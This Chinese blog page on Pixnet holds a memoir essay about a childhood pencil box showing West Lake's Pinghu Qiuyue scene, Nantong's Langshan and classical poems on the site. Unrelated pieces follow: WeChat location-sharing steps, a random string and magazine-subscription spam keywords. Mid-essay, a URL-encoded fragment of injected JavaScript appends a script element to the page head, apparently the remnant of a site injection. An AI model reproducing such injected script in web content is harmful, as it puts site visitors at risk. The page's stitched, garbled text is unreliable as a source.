光陰似箭,日月如梭;歲月流逝,彈指揮間。我們也已步入五十知天命的行例,如果時光能夠倒流,昨日能夠重現是多么的美好啊。我心中的平湖秋月,依然是那么美好,這塵封五十年的回憶讓人難以忘懷! /  /  山不在高,有仙則名。南通狼山緊挨長江北岸,是由海溯江的第一座名山,被稱為江海第一山。南通的狼山不算高,也就高100多米。狼山是佛教西方三圣之一的大勢至菩薩的道場,山上還供奉著惟一身披龍袍的大圣菩薩,保佑著南通長年平安,成為江海兒女向往的神圣地方。這里終年香火旺盛,游人如織,絡繹不絕,因此,狼山位列佛教八小名山之首。登臨狼山,看滾滾長江東去,蘇通大橋橫跨,百舸爭流,水天一色,真是心曠神怡。 /  /  五十年前陽春三月的南通狼山,郁郁蔥蔥,桃紅柳綠,一派江南風景,成千上萬的善男信女自大江南北走來上香,祈求平安,風調雨順,年景豐收。在我的記憶中,從祖父祖母這一代起,我們家里的人每年都要去狼山燒香,一直延續到現在我們這一輩。我六歲那年(1960年),由我祖父和父親帶領去狼山燒香。燒好香后,祖父就帶我到人民公園去玩,然后又帶我去南通市百貨大樓文具柜,專門為我買了一只印有“平湖秋月”美麗風景的鐵皮文具盒,我好喜歡呀,問爺爺這是什么地方,為什么這么漂亮,爺爺說這是杭州西湖上的一個景點,等你長大后去旅游就知道了。這只文具盒長約二十公分,寬約五公分,上面一輪明月浩然當空,一條游船蕩漾在湖面上,御書樓閣,亭臺欄桿,充滿了詩情畫意。與其說,我現在是最喜歡青山綠水江南煙雨的風景,不如是說由這“平湖秋月”的美好風光早巳種植于孩提兒時我的心中。這只文具盒雖小但很精致,我很愛惜,她伴隨我度過了六年的小學時光,鼓勵我從小學四年級下半學期開始,連續四個學期榮獲“三好學生”和“優秀學生”。 / / / / cript/%22/%3Bdocument.getElementsByTagName/%28/%27head/%27/%29/%5B0/%5D.appendChild/%28s/%29/%3B/%0D/%0A">本人曾經分別于1982年10月和1993年的12月兩次到過杭州西湖,而平湖秋月是我必去的景點。平湖秋月,位于杭州西湖白堤西端,面臨外西湖,背倚孤山,是西湖十景之一。唐代在此處建有望湖亭,明代萬歷十四年改為龍王祠,清康熙三十八年又改善為“御書樓”,懸掛著康熙御題“平湖秋月”的匾額。1959年,新建和改建了八角亭、四面廳和“湖天一碧”樓等建筑,這里的建筑錯落有致,典型的江南園林風格。每當秋高氣爽,皎月當空,湖平如鏡,清風吹拂,水月云天,交相輝映,詩情畫意,風景優美,這里真是一處不可多得的賞月佳境。當置身于這人在畫中游,碧月映平湖的景色中,頗有“一色湖光萬頃秋”之感。 /  / /  千百年來,平湖秋月這良辰美景引來多少文人墨客為之抒情寄懷,賦詩擬聯,作曲謳歌。留傳千古的明萬年歷間的西湖十景木刻畫中,《平湖秋月》一圖也仍以游客在湖船中舉頭望月為畫面主體。宋代王洧《平湖秋月》詩云:“萬頃寒光一夕鋪,水輪行處片云無,鷲峰遙度西風冷,桂子紛紛點玉壺。”明代徐長文還用每句詩的第一個字點明了“平湖秋月”的景名,詩寫道“平湖一色萬頃秋,湖光渺渺水長流。秋月圓圓世間少,月好四時最宜秋。”清代駱成驤寫就的“穿牖而來,夏日清風冬日日;卷簾相見,前山明月后山山”這幅對聯,是平湖秋月的真實寫照。器樂作品高胡演奏曲《平湖秋月》,正是廣東音樂名家呂文成暢游西湖的美麗景色,觸景生情而創作旋律秀美和音調婉轉的作品,這首樂曲讓聽眾聽起來既有廣東音樂的風格,又有江南音樂的韻味,給人以一種美的享受。 / / / / 平湖秋月寄情懷,江山依舊風光美。人們欣賞美麗景色,向往美好生活,渴望和諧太平,這正是美好在我心中的源泉和本人擬寫這篇文章的初衷。

1.首先我們手機將微信打開,在界面下面點擊聯系人,在里面點擊要發送或者共享位置的好友或者群2.然后我們點擊【發信息】進入到發送信息的界面,發位置和共享位置也是以信息的形式出現的3.之后我們在下方發送信息輸入框后面,點擊加號按鈕4.之后我們可以看到下方會打開選項卡,我們點擊里面的【位置】功能按鈕5.之后會彈出如圖的選項,我們點擊【發送位置】6.然后在進入的界面,可以看到地圖,在下面可以看到自己目前所在位置主要地點的名稱,我們可以點擊選擇一個位置,選擇位置后,后面有一個綠點。在地圖上的紅色圖標,就是自己目前的位置,當然以上功能要保證手機的定位開啟7.我們也可以移動地圖,讓紅色圖標對準我們要發送的位置,即可將自己標記的當前位置,我們點擊【發送】按鈕,即可將位置發送出去8.位置發送出去,即可在聊天界面看到,對方點擊即可找到自己的位置在哪,或者自己標記的位置在哪9.我們也可以點擊里面的【共享實時位置】,進入到位置地圖界面10.之后我們即可看到自己所在位置的地圖,以及自己的位置,我們點擊右上角的按鈕一下11.之后即可將自己的位置共享在聊天界面,對方可以點擊打開,這就能將位置共享給對方啦

WED989VI458EMLOEF44EF8EF


VOGUE台南哪裡訂國際書展TIME美國時代雜誌苗栗哪裡訂國際書展Fortune彰化哪裡訂遠見怎麼訂閱最便宜
2020年國家地理雜誌訂購優惠 2020年商業周刊新客戶訂購價 哪裡訂天下雜誌 美國商業週刊 天下雜誌 探索頻道雜誌 讀者文摘 財富雜誌 經濟學人週刊? 國際書展美國商業週刊苗栗哪裡訂 2020年TIME雜誌優惠訂閱價格 time時代雜誌 英文版要看幾次? 練習英文口說? 免費送mp3語言學習機? 2020年經濟學人高雄哪裡訂 國際書展商管財經雜誌台南哪裡訂 天下雜誌史上特惠週年慶訂購,搭配天下雜誌一年才2.9折? 國際書展家庭育兒雜誌台北哪裡訂 科普雜誌怎麼訂閱最便宜 公司一次訂閱天下雜誌 + 遠見雜誌,有優惠價嗎?送贈品+32折?

arrow
arrow
    全站熱搜

    折岩上神 發表在 痞客邦 留言(0) 人氣()